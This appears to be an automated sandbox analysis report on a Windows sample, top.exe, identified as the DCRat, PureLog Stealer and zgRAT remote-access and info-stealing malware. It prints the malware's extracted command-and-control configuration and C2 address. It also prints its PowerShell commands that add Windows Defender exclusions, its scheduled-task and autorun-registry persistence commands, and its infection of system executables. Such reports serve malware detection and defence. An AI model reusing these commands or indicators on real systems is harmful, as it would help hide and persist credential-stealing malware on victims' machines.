Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
top.exe

Overview

General Information

Sample name:top.exe
Analysis ID:1589198
MD5:92d29106be881759ef6f045a3415137d
SHA1:9b307b4b98851c4325a1f2746c7827a0d14c7e36
SHA256:b1996319c3b0fafa04179dd7b7de47c74be2dc3dc0d6aa04030b645970e1a9b0
Tags:DCRatexeNyashTeamuser-MalHunter1
Infos:

Detection

DCRat, PureLog Stealer, zgRAT
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected DCRat
Yara detected PureLog Stealer
Yara detected zgRAT
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Creates an undocumented autostart registry key
Creates multiple autostart registry keys
Creates processes via WMI
Drops PE files to the user root directory
Infects executable files (exe, dll, sys, html)
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Sample uses string decryption to hide its real strings
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Suspicious execution chain found
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Uses schtasks.exe or at.exe to add and modify task schedules
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Allocates memory with a write watch (potentially for evading sandboxes)
Compiles C# or VB.Net code
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops PE files to the user directory
Drops PE files to the windows directory (C:\Windows)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
File is packed with WinRar
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: CurrentVersion NT Autorun Keys Modification
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Powershell Defender Exclusion
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • top.exe (PID: 5804 cmdline: "C:\Users\user\Desktop\top.exe" MD5: 92D29106BE881759EF6F045A3415137D)
    • wscript.exe (PID: 6024 cmdline: "C:\Windows\System32\WScript.exe" "C:\msproviderBrokerMonitornet\qGDN1Ee4B98z7IBsvEaYenHfp3i4NGluh1QU7ALIT.vbe" MD5: FF00E0480075B095948000BDC66E81F0)
      • cmd.exe (PID: 6484 cmdline: C:\Windows\system32\cmd.exe /c ""C:\msproviderBrokerMonitornet\rS0XRrLecpgQD85mPzoGJptpB8S2GwiBTdu9z4xSSrCX90wlqwqwnpzpgY0I.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 412 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WinPerfcommon.exe (PID: 1020 cmdline: "C:\msproviderBrokerMonitornet/WinPerfcommon.exe" MD5: 6B9554367A439D39A00A0DFF9A08B123)
          • csc.exe (PID: 7060 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\04s13a00\04s13a00.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
            • conhost.exe (PID: 1576 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • cvtres.exe (PID: 3652 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4FDD.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSCAA8B5102F2134902BBA166DD4B5C8948.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
          • csc.exe (PID: 4052 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\imeik232\imeik232.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
            • conhost.exe (PID: 2876 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • cvtres.exe (PID: 5372 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES520F.tmp" "c:\Windows\System32\CSCBE040DD0C77A40C69F3560F59F6749C9.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
          • schtasks.exe (PID: 4072 cmdline: schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 9 /tr "'C:\Users\All Users\WindowsHolographicDevices\SpatialStore\WmiPrvSE.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 6184 cmdline: schtasks.exe /create /tn "wnSgpBKJabSHvDawwFjyhiOtGEGVta" /sc ONLOGON /tr "'C:\Users\user\wnSgpBKJabSHvDawwFjyhiOtGEGVta.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • powershell.exe (PID: 1272 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows portable devices\OfficeClickToRun.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 6468 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 1784 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\All Users\WindowsHolographicDevices\SpatialStore\WmiPrvSE.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 6444 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 6616 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\wnSgpBKJabSHvDawwFjyhiOtGEGVta.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 6436 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 4072 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\MSBuild\Microsoft\SystemSettings.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 6308 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 5552 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\wnSgpBKJabSHvDawwFjyhiOtGEGVta.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 6008 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 6184 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\msproviderBrokerMonitornet\WinPerfcommon.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 1720 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 7336 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\emoAWdy2Gj.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7364 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • chcp.com (PID: 7472 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
            • PING.EXE (PID: 7572 cmdline: ping -n 10 localhost MD5: 2F46799D79D22AC72C241EC0322B011D)
        • Conhost.exe (PID: 6044 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • WinPerfcommon.exe (PID: 7544 cmdline: C:\msproviderBrokerMonitornet\WinPerfcommon.exe MD5: 6B9554367A439D39A00A0DFF9A08B123)
  • WinPerfcommon.exe (PID: 7552 cmdline: C:\msproviderBrokerMonitornet\WinPerfcommon.exe MD5: 6B9554367A439D39A00A0DFF9A08B123)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
DCRatDCRat is a typical RAT that has been around since at least June 2019.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.dcrat
NameDescriptionAttributionBlogpost URLsLink
zgRATzgRAT is a Remote Access Trojan malware which sometimes drops other malware such as AgentTesla malware. zgRAT has an inforstealer use which targets browser information and cryptowallets.Usually spreads by USB or phishing emails with -zip/-lnk/.bat/.xlsx attachments and so on.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.zgrat

Malware Configuration

Threatname: DCRat

{"C2 url": "http://fsin.top/javascriptCentraldownloads", "MUTEX": "DCR_MUTEX-nQmtb0EsMA9tAW54k3K0", "Params": {"0": "{SYSTEMDRIVE}/Users/", "1": "false", "2": "false", "3": "true", "4": "true", "5": "true", "6": "true", "7": "false", "8": "true", "9": "true", "10": "true", "11": "true", "12": "true", "13": "true", "14": "true"}}

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
top.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
    top.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security

      Dropped Files

      SourceRuleDescriptionAuthorStrings
      C:\Program Files (x86)\Windows Portable Devices\OfficeClickToRun.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
        C:\Program Files (x86)\Windows Portable Devices\OfficeClickToRun.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
          C:\Recovery\wnSgpBKJabSHvDawwFjyhiOtGEGVta.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
            C:\Recovery\wnSgpBKJabSHvDawwFjyhiOtGEGVta.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
              C:\msproviderBrokerMonitornet\WinPerfcommon.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
                Click to see the 7 entries

                Memory Dumps

                SourceRuleDescriptionAuthorStrings
                00000006.00000000.2354556207.00000000006E2000.00000002.00000001.01000000.0000000A.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                  00000000.00000003.2044302589.00000000065FE000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                    00000000.00000003.2045393819.0000000006F0E000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                      00000006.00000002.2441510550.0000000012C8C000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
                        Process Memory Space: WinPerfcommon.exe PID: 1020JoeSecurity_DCRat_1Yara detected DCRatJoe Security

                          Unpacked PEs

                          SourceRuleDescriptionAuthorStrings
                          0.3.top.exe.664c701.0.raw.unpackJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
                            0.3.top.exe.664c701.0.raw.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                              0.3.top.exe.6f5c701.1.raw.unpackJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
                                0.3.top.exe.6f5c701.1.raw.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                                  0.3.top.exe.6f5c701.1.unpackJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
                                    Click to see the 5 entries

                                    Sigma Signatures

                                    System Summary

                                    barindex
                                    Sigma detected: Files With System Process Name In Unsuspected Locations
                                    Source: File createdAuthor: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\msproviderBrokerMonitornet\WinPerfcommon.exe, ProcessId: 1020, TargetFilename: C:\Users\All Users\WindowsHolographicDevices\SpatialStore\WmiPrvSE.exe
                                    Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows portable devices\OfficeClickToRun.exe', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows portable devices\OfficeClickToRun.exe', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\msproviderBrokerMonitornet/WinPerfcommon.exe", ParentImage: C:\msproviderBrokerMonitornet\WinPerfcommon.exe, ParentProcessId: 1020, ParentProcessName: WinPerfcommon.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows portable devices\OfficeClickToRun.exe', ProcessId: 1272, ProcessName: powershell.exe
                                    Sigma detected: CurrentVersion Autorun Keys Modification
                                    Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\Program Files (x86)\windows portable devices\OfficeClickToRun.exe", EventID: 13, EventType: SetValue, Image: C:\msproviderBrokerMonitornet\WinPerfcommon.exe, ProcessId: 1020, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OfficeClickToRun
                                    Sigma detected: CurrentVersion NT Autorun Keys Modification
                                    Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: explorer.exe, "C:\Program Files (x86)\windows portable devices\OfficeClickToRun.exe", EventID: 13, EventType: SetValue, Image: C:\msproviderBrokerMonitornet\WinPerfcommon.exe, ProcessId: 1020, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell
                                    Sigma detected: Dynamic .NET Compilation Via Csc.EXE
                                    Source: Process startedAuthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\04s13a00\04s13a00.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\04s13a00\04s13a00.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\msproviderBrokerMonitornet/WinPerfcommon.exe", ParentImage: C:\msproviderBrokerMonitornet\WinPerfcommon.exe, ParentProcessId: 1020, ParentProcessName: WinPerfcommon.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\04s13a00\04s13a00.cmdline", ProcessId: 7060, ProcessName: csc.exe
                                    Sigma detected: Powershell Defender Exclusion
                                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows portable devices\OfficeClickToRun.exe', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows portable devices\OfficeClickToRun.exe', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\msproviderBrokerMonitornet/WinPerfcommon.exe", ParentImage: C:\msproviderBrokerMonitornet\WinPerfcommon.exe, ParentProcessId: 1020, ParentProcessName: WinPerfcommon.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows portable devices\OfficeClickToRun.exe', ProcessId: 1272, ProcessName: powershell.exe
                                    Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
                                    Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\msproviderBrokerMonitornet\qGDN1Ee4B98z7IBsvEaYenHfp3i4NGluh1QU7ALIT.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\msproviderBrokerMonitornet\qGDN1Ee4B98z7IBsvEaYenHfp3i4NGluh1QU7ALIT.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\top.exe", ParentImage: C:\Users\user\Desktop\top.exe, ParentProcessId: 5804, ParentProcessName: top.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\msproviderBrokerMonitornet\qGDN1Ee4B98z7IBsvEaYenHfp3i4NGluh1QU7ALIT.vbe" , ProcessId: 6024, ProcessName: wscript.exe
                                    Sigma detected: Dynamic CSharp Compile Artefact
                                    Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\msproviderBrokerMonitornet\WinPerfcommon.exe, ProcessId: 1020, TargetFilename: C:\Users\user\AppData\Local\Temp\04s13a00\04s13a00.cmdline
                                    Sigma detected: Non Interactive PowerShell Process Spawned
                                    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows portable devices\OfficeClickToRun.exe', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows portable devices\OfficeClickToRun.exe', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\msproviderBrokerMonitornet/WinPerfcommon.exe", ParentImage: C:\msproviderBrokerMonitornet\WinPerfcommon.exe, ParentProcessId: 1020, ParentProcessName: WinPerfcommon.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows portable devices\OfficeClickToRun.exe', ProcessId: 1272, ProcessName: powershell.exe

                                    Data Obfuscation

                                    barindex
                                    Sigma detected: Dot net compiler compiles file from suspicious location
                                    Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\04s13a00\04s13a00.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\04s13a00\04s13a00.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\msproviderBrokerMonitornet/WinPerfcommon.exe", ParentImage: C:\msproviderBrokerMonitornet\WinPerfcommon.exe, ParentProcessId: 1020, ParentProcessName: WinPerfcommon.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\04s13a00\04s13a00.cmdline", ProcessId: 7060, ProcessName: csc.exe

                                    Suricata Signatures

                                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                    2025-01-11T16:26:23.560182+010020480951A Network Trojan was detected192.168.2.54997737.44.238.25080TCP
                                    2025-01-11T16:26:33.496954+010020480951A Network Trojan was detected192.168.2.54997837.44.238.25080TCP
                                    2025-01-11T16:26:59.674732+010020480951A Network Trojan was detected192.168.2.54997937.44.238.25080TCP
                                    2025-01-11T16:27:26.325074+010020480951A Network Trojan was detected192.168.2.54998037.44.238.25080TCP
                                    2025-01-11T16:27:37.715695+010020480951A Network Trojan was detected192.168.2.54998137.44.238.25080TCP
                                    2025-01-11T16:27:43.583688+010020480951A Network Trojan was detected192.168.2.54998237.44.238.25080TCP

                                    Joe Sandbox Signatures

                                    Click to jump to signature section

                                    Show All Signature Results

                                    AV Detection

                                    barindex
                                    Antivirus / Scanner detection for submitted sample
                                    Source: top.exeAvira: detected
                                    Antivirus detection for dropped file
                                    Source: C:\Program Files\MSBuild\Microsoft\SystemSettings.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                                    Source: C:\ProgramData\WindowsHolographicDevices\SpatialStore\WmiPrvSE.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                                    Source: C:\Recovery\wnSgpBKJabSHvDawwFjyhiOtGEGVta.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                                    Source: C:\Users\user\Desktop\kTYwyifI.logAvira: detection malicious, Label: TR/PSW.Agent.qngqt
                                    Source: C:\Users\user\Desktop\alFgOGaa.logAvira: detection malicious, Label: TR/AVI.Agent.updqb
                                    Source: C:\Program Files (x86)\Windows Portable Devices\OfficeClickToRun.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                                    Source: C:\Users\user\AppData\Local\Temp\emoAWdy2Gj.batAvira: detection malicious, Label: BAT/Delbat.C
                                    Source: C:\Users\user\Desktop\Qxaqfufs.logAvira: detection malicious, Label: TR/AD.BitpyRansom.lcksd
                                    Found malware configuration
                                    Source: 00000006.00000002.2441510550.0000000012C8C000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: DCRat {"C2 url": "http://fsin.top/javascriptCentraldownloads", "MUTEX": "DCR_MUTEX-nQmtb0EsMA9tAW54k3K0", "Params": {"0": "{SYSTEMDRIVE}/Users/", "1": "false", "2": "false", "3": "true", "4": "true", "5": "true", "6": "true", "7": "false", "8": "true", "9": "true", "10": "true", "11": "true", "12": "true", "13": "true", "14": "true"}}
                                    Multi AV Scanner detection for dropped file
                                    Source: C:\Program Files (x86)\Windows Portable Devices\OfficeClickToRun.exeReversingLabs: Detection: 63%
                                    Source: C:\Program Files (x86)\Windows Portable Devices\OfficeClickToRun.exeVirustotal: Detection: 70%Perma Link
                                    Source: C:\Program Files\MSBuild\Microsoft\SystemSettings.exeReversingLabs: Detection: 63%
                                    Source: C:\Program Files\MSBuild\Microsoft\SystemSettings.exeVirustotal: Detection: 70%Perma Link
                                    Source: C:\ProgramData\WindowsHolographicDevices\SpatialStore\WmiPrvSE.exeReversingLabs: Detection: 63%
                                    Source: C:\ProgramData\WindowsHolographicDevices\SpatialStore\WmiPrvSE.exeVirustotal: Detection: 70%Perma Link
                                    Source: C:\Recovery\wnSgpBKJabSHvDawwFjyhiOtGEGVta.exeReversingLabs: Detection: 63%
                                    Source: C:\Users\user\Desktop\GOHavRZK.logReversingLabs: Detection: 37%
                                    Source: C:\Users\user\Desktop\Qxaqfufs.logReversingLabs: Detection: 33%
                                    Source: C:\Users\user\Desktop\ZndYtGLf.logReversingLabs: Detection: 25%
                                    Source: C:\Users\user\Desktop\alFgOGaa.logReversingLabs: Detection: 50%
                                    Source: C:\Users\user\Desktop\kTYwyifI.logReversingLabs: Detection: 70%
                                    Source: C:\Users\user\wnSgpBKJabSHvDawwFjyhiOtGEGVta.exeReversingLabs: Detection: 63%
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeReversingLabs: Detection: 63%
                                    Multi AV Scanner detection for submitted file
                                    Source: top.exeVirustotal: Detection: 56%Perma Link
                                    Source: top.exeReversingLabs: Detection: 57%
                                    AI detected suspicious sample
                                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 98.9% probability
                                    Machine Learning detection for dropped file
                                    Source: C:\Program Files\MSBuild\Microsoft\SystemSettings.exeJoe Sandbox ML: detected
                                    Source: C:\ProgramData\WindowsHolographicDevices\SpatialStore\WmiPrvSE.exeJoe Sandbox ML: detected
                                    Source: C:\Recovery\wnSgpBKJabSHvDawwFjyhiOtGEGVta.exeJoe Sandbox ML: detected
                                    Source: C:\Users\user\Desktop\kTYwyifI.logJoe Sandbox ML: detected
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeJoe Sandbox ML: detected
                                    Source: C:\Program Files (x86)\Windows Portable Devices\OfficeClickToRun.exeJoe Sandbox ML: detected
                                    Source: C:\Users\user\Desktop\SHwrfMKt.logJoe Sandbox ML: detected
                                    Machine Learning detection for sample
                                    Source: top.exeJoe Sandbox ML: detected
                                    Sample uses string decryption to hide its real strings
                                    Source: 00000006.00000002.2441510550.0000000012C8C000.00000004.00000800.00020000.00000000.sdmpString decryptor: {"0":[],"2a025748-b498-4ae9-8f8c-b763dd8b5ffc":{"_0":"Full","_1":"False","_2":"False","_3":"False"},"20c484a2-7b5b-481d-bf01-55d423c9c2fd":{"_0":""},"ff275d84-13f9-47b8-9de6-a3dfeab3ea1e":{"_0":"Builds"}}
                                    Source: 00000006.00000002.2441510550.0000000012C8C000.00000004.00000800.00020000.00000000.sdmpString decryptor: ["bj0UKX3O1fsx9BYPGXoKHqjvLayVva1jN63FIaBpzhY4ZE1D43om8NOuAFJtihcbnIkDHSHpW8UjRpWHjvb2vPk9sIFCRRHSF7QQdy5lw8PA2odUtBKwGkpYhlU9MEYF","DCR_MUTEX-nQmtb0EsMA9tAW54k3K0","0","","","5","2","WyIxIiwiIiwiNSJd","WyIiLCJXeUlpTENJaUxDSmxlVWwzU1dwdmFXVXhUbHBWTVZKR1ZGVlNVMU5XV2tabVV6bFdZekpXZVdONU9HbE1RMGw0U1dwdmFWcHRSbk5qTWxWcFRFTkplVWxxYjJsYWJVWnpZekpWYVV4RFNYcEphbTlwWkVoS01WcFRTWE5KYWxGcFQybEtNR051Vm14SmFYZHBUbE5KTmtsdVVubGtWMVZwVEVOSk1rbHFiMmxrU0VveFdsTkpjMGxxWTJsUGFVcHRXVmQ0ZWxwVFNYTkphbWRwVDJsS01HTnVWbXhKYVhkcFQxTkpOa2x1VW5sa1YxVnBURU5KZUUxRFNUWkpibEo1WkZkVmFVeERTWGhOVTBrMlNXNVNlV1JYVldsTVEwbDRUV2xKTmtsdVVubGtWMVZwVEVOSmVFMTVTVFpKYmxKNVpGZFZhVXhEU1hoT1EwazJTVzVTZVdSWFZXbG1VVDA5SWwwPSJd"]
                                    Source: 00000006.00000002.2441510550.0000000012C8C000.00000004.00000800.00020000.00000000.sdmpString decryptor: [["http://fsin.top/","javascriptCentraldownloads"]]
                                    Source: top.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeDirectory created: C:\Program Files\MSBuild\Microsoft\SystemSettings.exeJump to behavior
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeDirectory created: C:\Program Files\MSBuild\Microsoft\9e60a5f7a3bd80Jump to behavior
                                    Source: top.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                    Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: top.exe
                                    Source: Binary string: 8C:\Users\user\AppData\Local\Temp\imeik232\imeik232.pdb source: WinPerfcommon.exe, 00000006.00000002.2427021597.000000000343E000.00000004.00000800.00020000.00000000.sdmp
                                    Source: Binary string: 8C:\Users\user\AppData\Local\Temp\04s13a00\04s13a00.pdb source: WinPerfcommon.exe, 00000006.00000002.2427021597.000000000343E000.00000004.00000800.00020000.00000000.sdmp

                                    Spreading

                                    barindex
                                    Infects executable files (exe, dll, sys, html)
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSystem file written: C:\Windows\System32\SecurityHealthSystray.exeJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeJump to behavior
                                    Source: C:\Users\user\Desktop\top.exeCode function: 0_2_0045A69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_0045A69B
